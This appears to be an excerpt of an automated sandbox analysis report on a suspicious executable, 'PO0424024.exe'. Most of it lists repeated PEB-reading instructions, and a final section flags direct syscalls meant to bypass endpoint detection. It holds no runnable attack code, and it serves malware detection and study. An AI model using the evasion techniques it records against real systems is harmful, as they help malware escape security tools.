Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FE2349 mov eax, dword ptr fs:[00000030h]	2_2_00FE2349
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FE2349 mov eax, dword ptr fs:[00000030h]	2_2_00FE2349
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FE2349 mov eax, dword ptr fs:[00000030h]	2_2_00FE2349
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F5D34C mov eax, dword ptr fs:[00000030h]	2_2_00F5D34C
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F5D34C mov eax, dword ptr fs:[00000030h]	2_2_00F5D34C
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F57330 mov eax, dword ptr fs:[00000030h]	2_2_00F57330
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F8F32A mov eax, dword ptr fs:[00000030h]	2_2_00F8F32A
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_010352E2 mov eax, dword ptr fs:[00000030h]	2_2_010352E2
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F5C310 mov ecx, dword ptr fs:[00000030h]	2_2_00F5C310
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F80310 mov ecx, dword ptr fs:[00000030h]	2_2_00F80310
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_010112ED mov eax, dword ptr fs:[00000030h]	2_2_010112ED
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_010112ED mov eax, dword ptr fs:[00000030h]	2_2_010112ED
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_010112ED mov eax, dword ptr fs:[00000030h]	2_2_010112ED
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_010112ED mov eax, dword ptr fs:[00000030h]	2_2_010112ED
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_010112ED mov eax, dword ptr fs:[00000030h]	2_2_010112ED
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_010112ED mov eax, dword ptr fs:[00000030h]	2_2_010112ED
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_010112ED mov eax, dword ptr fs:[00000030h]	2_2_010112ED
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_010112ED mov eax, dword ptr fs:[00000030h]	2_2_010112ED
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_010112ED mov eax, dword ptr fs:[00000030h]	2_2_010112ED
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_010112ED mov eax, dword ptr fs:[00000030h]	2_2_010112ED
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_010112ED mov eax, dword ptr fs:[00000030h]	2_2_010112ED
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_010112ED mov eax, dword ptr fs:[00000030h]	2_2_010112ED
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_010112ED mov eax, dword ptr fs:[00000030h]	2_2_010112ED
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_010112ED mov eax, dword ptr fs:[00000030h]	2_2_010112ED
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F9A30B mov eax, dword ptr fs:[00000030h]	2_2_00F9A30B
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F9A30B mov eax, dword ptr fs:[00000030h]	2_2_00F9A30B
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F9A30B mov eax, dword ptr fs:[00000030h]	2_2_00F9A30B
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FE930B mov eax, dword ptr fs:[00000030h]	2_2_00FE930B
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FE930B mov eax, dword ptr fs:[00000030h]	2_2_00FE930B
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FE930B mov eax, dword ptr fs:[00000030h]	2_2_00FE930B
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_0101F2F8 mov eax, dword ptr fs:[00000030h]	2_2_0101F2F8
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_01034500 mov eax, dword ptr fs:[00000030h]	2_2_01034500
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_01034500 mov eax, dword ptr fs:[00000030h]	2_2_01034500
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_01034500 mov eax, dword ptr fs:[00000030h]	2_2_01034500
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_01034500 mov eax, dword ptr fs:[00000030h]	2_2_01034500
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_01034500 mov eax, dword ptr fs:[00000030h]	2_2_01034500
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_01034500 mov eax, dword ptr fs:[00000030h]	2_2_01034500
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_01034500 mov eax, dword ptr fs:[00000030h]	2_2_01034500
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F604E5 mov ecx, dword ptr fs:[00000030h]	2_2_00F604E5
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_0100F525 mov eax, dword ptr fs:[00000030h]	2_2_0100F525
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_0100F525 mov eax, dword ptr fs:[00000030h]	2_2_0100F525
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_0100F525 mov eax, dword ptr fs:[00000030h]	2_2_0100F525
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_0100F525 mov eax, dword ptr fs:[00000030h]	2_2_0100F525
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_0100F525 mov eax, dword ptr fs:[00000030h]	2_2_0100F525
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_0100F525 mov eax, dword ptr fs:[00000030h]	2_2_0100F525
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_0100F525 mov eax, dword ptr fs:[00000030h]	2_2_0100F525
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_0101B52F mov eax, dword ptr fs:[00000030h]	2_2_0101B52F
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_01035537 mov eax, dword ptr fs:[00000030h]	2_2_01035537
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F934B0 mov eax, dword ptr fs:[00000030h]	2_2_00F934B0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F944B0 mov ecx, dword ptr fs:[00000030h]	2_2_00F944B0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FEA4B0 mov eax, dword ptr fs:[00000030h]	2_2_00FEA4B0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F664AB mov eax, dword ptr fs:[00000030h]	2_2_00F664AB
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F69486 mov eax, dword ptr fs:[00000030h]	2_2_00F69486
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F69486 mov eax, dword ptr fs:[00000030h]	2_2_00F69486
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F5B480 mov eax, dword ptr fs:[00000030h]	2_2_00F5B480
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F8A470 mov eax, dword ptr fs:[00000030h]	2_2_00F8A470
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F8A470 mov eax, dword ptr fs:[00000030h]	2_2_00F8A470
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F8A470 mov eax, dword ptr fs:[00000030h]	2_2_00F8A470
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F61460 mov eax, dword ptr fs:[00000030h]	2_2_00F61460
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F61460 mov eax, dword ptr fs:[00000030h]	2_2_00F61460
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F61460 mov eax, dword ptr fs:[00000030h]	2_2_00F61460
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F61460 mov eax, dword ptr fs:[00000030h]	2_2_00F61460
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F61460 mov eax, dword ptr fs:[00000030h]	2_2_00F61460
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F7F460 mov eax, dword ptr fs:[00000030h]	2_2_00F7F460
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F7F460 mov eax, dword ptr fs:[00000030h]	2_2_00F7F460
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F7F460 mov eax, dword ptr fs:[00000030h]	2_2_00F7F460
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F7F460 mov eax, dword ptr fs:[00000030h]	2_2_00F7F460
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F7F460 mov eax, dword ptr fs:[00000030h]	2_2_00F7F460
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F7F460 mov eax, dword ptr fs:[00000030h]	2_2_00F7F460
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F8245A mov eax, dword ptr fs:[00000030h]	2_2_00F8245A
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F5645D mov eax, dword ptr fs:[00000030h]	2_2_00F5645D
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F6B440 mov eax, dword ptr fs:[00000030h]	2_2_00F6B440
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F6B440 mov eax, dword ptr fs:[00000030h]	2_2_00F6B440
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F6B440 mov eax, dword ptr fs:[00000030h]	2_2_00F6B440
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F6B440 mov eax, dword ptr fs:[00000030h]	2_2_00F6B440
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F6B440 mov eax, dword ptr fs:[00000030h]	2_2_00F6B440
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F6B440 mov eax, dword ptr fs:[00000030h]	2_2_00F6B440
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F9E443 mov eax, dword ptr fs:[00000030h]	2_2_00F9E443
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F9E443 mov eax, dword ptr fs:[00000030h]	2_2_00F9E443
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F9E443 mov eax, dword ptr fs:[00000030h]	2_2_00F9E443
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F9E443 mov eax, dword ptr fs:[00000030h]	2_2_00F9E443
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F9E443 mov eax, dword ptr fs:[00000030h]	2_2_00F9E443
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F9E443 mov eax, dword ptr fs:[00000030h]	2_2_00F9E443
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F9E443 mov eax, dword ptr fs:[00000030h]	2_2_00F9E443
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F9E443 mov eax, dword ptr fs:[00000030h]	2_2_00F9E443
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_0101F5BE mov eax, dword ptr fs:[00000030h]	2_2_0101F5BE
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_010355C9 mov eax, dword ptr fs:[00000030h]	2_2_010355C9
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F5C427 mov eax, dword ptr fs:[00000030h]	2_2_00F5C427
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_010335D7 mov eax, dword ptr fs:[00000030h]	2_2_010335D7
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_010335D7 mov eax, dword ptr fs:[00000030h]	2_2_010335D7
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_010335D7 mov eax, dword ptr fs:[00000030h]	2_2_010335D7
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F5E420 mov eax, dword ptr fs:[00000030h]	2_2_00F5E420
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F5E420 mov eax, dword ptr fs:[00000030h]	2_2_00F5E420
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F5E420 mov eax, dword ptr fs:[00000030h]	2_2_00F5E420
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F8340D mov eax, dword ptr fs:[00000030h]	2_2_00F8340D
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F98402 mov eax, dword ptr fs:[00000030h]	2_2_00F98402
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F98402 mov eax, dword ptr fs:[00000030h]	2_2_00F98402
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F98402 mov eax, dword ptr fs:[00000030h]	2_2_00F98402
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F815F4 mov eax, dword ptr fs:[00000030h]	2_2_00F815F4
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F815F4 mov eax, dword ptr fs:[00000030h]	2_2_00F815F4
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F815F4 mov eax, dword ptr fs:[00000030h]	2_2_00F815F4
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F815F4 mov eax, dword ptr fs:[00000030h]	2_2_00F815F4
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F815F4 mov eax, dword ptr fs:[00000030h]	2_2_00F815F4
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F815F4 mov eax, dword ptr fs:[00000030h]	2_2_00F815F4
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F9C5ED mov eax, dword ptr fs:[00000030h]	2_2_00F9C5ED
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F9C5ED mov eax, dword ptr fs:[00000030h]	2_2_00F9C5ED
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F625E0 mov eax, dword ptr fs:[00000030h]	2_2_00F625E0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F8E5E7 mov eax, dword ptr fs:[00000030h]	2_2_00F8E5E7
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F8E5E7 mov eax, dword ptr fs:[00000030h]	2_2_00F8E5E7
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F8E5E7 mov eax, dword ptr fs:[00000030h]	2_2_00F8E5E7
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F8E5E7 mov eax, dword ptr fs:[00000030h]	2_2_00F8E5E7
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F8E5E7 mov eax, dword ptr fs:[00000030h]	2_2_00F8E5E7
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F8E5E7 mov eax, dword ptr fs:[00000030h]	2_2_00F8E5E7
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F8E5E7 mov eax, dword ptr fs:[00000030h]	2_2_00F8E5E7
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F8E5E7 mov eax, dword ptr fs:[00000030h]	2_2_00F8E5E7
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F895DA mov eax, dword ptr fs:[00000030h]	2_2_00F895DA
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F665D0 mov eax, dword ptr fs:[00000030h]	2_2_00F665D0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F9A5D0 mov eax, dword ptr fs:[00000030h]	2_2_00F9A5D0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F9A5D0 mov eax, dword ptr fs:[00000030h]	2_2_00F9A5D0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FDD5D0 mov eax, dword ptr fs:[00000030h]	2_2_00FDD5D0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FDD5D0 mov ecx, dword ptr fs:[00000030h]	2_2_00FDD5D0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F9E5CF mov eax, dword ptr fs:[00000030h]	2_2_00F9E5CF
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F9E5CF mov eax, dword ptr fs:[00000030h]	2_2_00F9E5CF
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F955C0 mov eax, dword ptr fs:[00000030h]	2_2_00F955C0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FF35BA mov eax, dword ptr fs:[00000030h]	2_2_00FF35BA
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FF35BA mov eax, dword ptr fs:[00000030h]	2_2_00FF35BA
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FF35BA mov eax, dword ptr fs:[00000030h]	2_2_00FF35BA
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FF35BA mov eax, dword ptr fs:[00000030h]	2_2_00FF35BA
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F8F5B0 mov eax, dword ptr fs:[00000030h]	2_2_00F8F5B0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F8F5B0 mov eax, dword ptr fs:[00000030h]	2_2_00F8F5B0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F8F5B0 mov eax, dword ptr fs:[00000030h]	2_2_00F8F5B0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F8F5B0 mov eax, dword ptr fs:[00000030h]	2_2_00F8F5B0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F8F5B0 mov eax, dword ptr fs:[00000030h]	2_2_00F8F5B0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F8F5B0 mov eax, dword ptr fs:[00000030h]	2_2_00F8F5B0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F8F5B0 mov eax, dword ptr fs:[00000030h]	2_2_00F8F5B0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F8F5B0 mov eax, dword ptr fs:[00000030h]	2_2_00F8F5B0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F8F5B0 mov eax, dword ptr fs:[00000030h]	2_2_00F8F5B0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F845B1 mov eax, dword ptr fs:[00000030h]	2_2_00F845B1
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F845B1 mov eax, dword ptr fs:[00000030h]	2_2_00F845B1
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F815A9 mov eax, dword ptr fs:[00000030h]	2_2_00F815A9
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F815A9 mov eax, dword ptr fs:[00000030h]	2_2_00F815A9
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F815A9 mov eax, dword ptr fs:[00000030h]	2_2_00F815A9
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F815A9 mov eax, dword ptr fs:[00000030h]	2_2_00F815A9
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F815A9 mov eax, dword ptr fs:[00000030h]	2_2_00F815A9
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_0101F453 mov eax, dword ptr fs:[00000030h]	2_2_0101F453
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FE05A7 mov eax, dword ptr fs:[00000030h]	2_2_00FE05A7
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FE05A7 mov eax, dword ptr fs:[00000030h]	2_2_00FE05A7
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FE05A7 mov eax, dword ptr fs:[00000030h]	2_2_00FE05A7
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F9E59C mov eax, dword ptr fs:[00000030h]	2_2_00F9E59C
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FEB594 mov eax, dword ptr fs:[00000030h]	2_2_00FEB594
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FEB594 mov eax, dword ptr fs:[00000030h]	2_2_00FEB594
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F94588 mov eax, dword ptr fs:[00000030h]	2_2_00F94588
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F62582 mov eax, dword ptr fs:[00000030h]	2_2_00F62582
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F62582 mov ecx, dword ptr fs:[00000030h]	2_2_00F62582
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F5758F mov eax, dword ptr fs:[00000030h]	2_2_00F5758F
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F5758F mov eax, dword ptr fs:[00000030h]	2_2_00F5758F
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F5758F mov eax, dword ptr fs:[00000030h]	2_2_00F5758F
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_0103547F mov eax, dword ptr fs:[00000030h]	2_2_0103547F
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F9B570 mov eax, dword ptr fs:[00000030h]	2_2_00F9B570
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F9B570 mov eax, dword ptr fs:[00000030h]	2_2_00F9B570
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F9656A mov eax, dword ptr fs:[00000030h]	2_2_00F9656A
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F9656A mov eax, dword ptr fs:[00000030h]	2_2_00F9656A
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F9656A mov eax, dword ptr fs:[00000030h]	2_2_00F9656A
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F5B562 mov eax, dword ptr fs:[00000030h]	2_2_00F5B562
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F68550 mov eax, dword ptr fs:[00000030h]	2_2_00F68550
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F68550 mov eax, dword ptr fs:[00000030h]	2_2_00F68550
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F70535 mov eax, dword ptr fs:[00000030h]	2_2_00F70535
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F70535 mov eax, dword ptr fs:[00000030h]	2_2_00F70535
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F70535 mov eax, dword ptr fs:[00000030h]	2_2_00F70535
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F70535 mov eax, dword ptr fs:[00000030h]	2_2_00F70535
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F70535 mov eax, dword ptr fs:[00000030h]	2_2_00F70535
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F70535 mov eax, dword ptr fs:[00000030h]	2_2_00F70535
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F6D534 mov eax, dword ptr fs:[00000030h]	2_2_00F6D534
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F6D534 mov eax, dword ptr fs:[00000030h]	2_2_00F6D534
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F6D534 mov eax, dword ptr fs:[00000030h]	2_2_00F6D534
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F6D534 mov eax, dword ptr fs:[00000030h]	2_2_00F6D534
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F6D534 mov eax, dword ptr fs:[00000030h]	2_2_00F6D534
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F6D534 mov eax, dword ptr fs:[00000030h]	2_2_00F6D534
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F8E53E mov eax, dword ptr fs:[00000030h]	2_2_00F8E53E
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F8E53E mov eax, dword ptr fs:[00000030h]	2_2_00F8E53E
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F8E53E mov eax, dword ptr fs:[00000030h]	2_2_00F8E53E
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F8E53E mov eax, dword ptr fs:[00000030h]	2_2_00F8E53E
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F8E53E mov eax, dword ptr fs:[00000030h]	2_2_00F8E53E
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F9D530 mov eax, dword ptr fs:[00000030h]	2_2_00F9D530
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F9D530 mov eax, dword ptr fs:[00000030h]	2_2_00F9D530
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_010354DB mov eax, dword ptr fs:[00000030h]	2_2_010354DB
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_010094E0 mov eax, dword ptr fs:[00000030h]	2_2_010094E0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F97505 mov eax, dword ptr fs:[00000030h]	2_2_00F97505

Source: C:\Users\user\Desktop\PO0424024.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe	NtWriteVirtualMemory: Direct from: 0x76F0490C	Jump to behavior
Source: C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe	NtOpenKeyEx: Direct from: 0x76F03C9C	Jump to behavior
Source: C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe	NtClose: Direct from: 0x76F02B6C
Source: C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe	NtCreateKey: Direct from: 0x76F02C6C	Jump to behavior
Source: C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe	NtReadVirtualMemory: Direct from: 0x76F02E8C	Jump to behavior
Source: C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe	NtSetInformationThread: Direct from: 0x76F02B4C	Jump to behavior
Source: C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe	NtQueryAttributesFile: Direct from: 0x76F02E6C	Jump to behavior
Source: C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe	NtAllocateVirtualMemory: Direct from: 0x76F048EC	Jump to behavior
Source: C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe	NtQuerySystemInformation: Direct from: 0x76F048CC	Jump to behavior
Source: C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe	NtQueryVolumeInformationFile: Direct from: 0x76F02F2C	Jump to behavior
Source: C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe	NtOpenSection: Direct from: 0x76F02E0C	Jump to behavior
Source: C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe	NtSetInformationThread: Direct from: 0x76EF63F9	Jump to behavior
